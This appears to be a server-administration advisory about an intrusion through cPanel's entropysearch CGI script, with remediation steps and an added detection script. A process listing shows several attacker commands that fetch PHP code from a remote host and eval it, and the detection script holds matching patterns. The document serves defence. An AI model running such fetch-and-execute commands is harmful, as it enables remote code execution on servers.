Hack Attempt via entropysearch CGI script

If you notice high load on your server and processes like the following running, be alert! Something is wrong on your server.

 


877082 aatwdhh  20   0  332m 3232  520 R 45.9  0.0 105:23.78 php -r eval(file_get_contents(‘http://hello. hacked. jp/hello/n.php?a=207589788&b=26786093&u=
750767 coavjuwv3  20   0  332m 6308  512 R 45.5  0.1 391:25.41 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=683074642&b=88133019&u= o
859849 anafcte  20   0  332m 7900  512 R 45.5  0.1 126:15.42 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=387327366&b=49975220&u=  .
939351 baavgfmor  20   0  332m  16m 9960 R 44.8  0.2   3:57.21 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=252084665&b=32527086&u=
928864 bqcagom     20   0  332m 7928  548 R 43.6  0.1   9:23.19 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=960742077&b=123956558&u= cgi-
818841 alasdeno  20   0  332m 6588  504 R 42.9  0.1 255:40.30 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=888691102&b=114660873&u=al-


 

You need to deal with it as soon as possible. A fast solution is to disable entropysearch: log in to your server as root and run the command below.

 

#chmod 000 /usr/local/cpanel/cgi-sys/entropysearch.cgi

 

Then kill all php processes using killall -9 php

The load will return to normal as soon as you have performed the above steps. We suggest you get your server scanned and raise your firewall level.
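To find which accounts are running the process pattern shown in the listing above before killing anything, here is an added example that is not part of the original post. It assumes input in the form produced by `ps -eo pid=,user=,args=`; the function names, sample lines and `example.invalid` host are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag PHP CLI processes whose inline (-r) code evals
# content fetched from a remote URL, as in the listing above.
# Assumed input: one process per line, "PID USER COMMAND ARGS...".

find_remote_eval_php() {
    # Reads process lines on stdin; prints "PID USER" for each match.
    awk '{
        # Take the basename of the executable so /usr/bin/php also matches.
        n = split($3, parts, "/"); exe = parts[n]
        if (exe ~ /^php[0-9.]*$/ &&
            index($0, " -r ") > 0 &&
            $0 ~ /eval\(file_get_contents\([^a-z]*https?:\/\//)
            print $1, $2
    }'
}

# Constructed sample input (not real output from any server).
sample_ps() {
    cat <<'EOF'
1001 userone php -r eval(file_get_contents('http://example.invalid/n.php?a=1&b=2&u=x'));
1002 usertwo /usr/bin/php /home/usertwo/public_html/cron.php
1003 userthree php -r echo date('c');
1004 userfour /usr/local/bin/php -r eval(file_get_contents("http://example.invalid/n.php?a=3"));
1005 root sshd: root@pts/0
EOF
}

# Demo on the constructed sample: prints the two matching PID/user pairs.
sample_ps | find_remote_eval_php

# On a live host (prints nothing if no such process exists):
#   ps -eo pid=,user=,args= | find_remote_eval_php
```

The PID and user columns show which accounts to review during the follow-up scan, and ordinary PHP scripts and harmless `php -r` one-liners are not flagged.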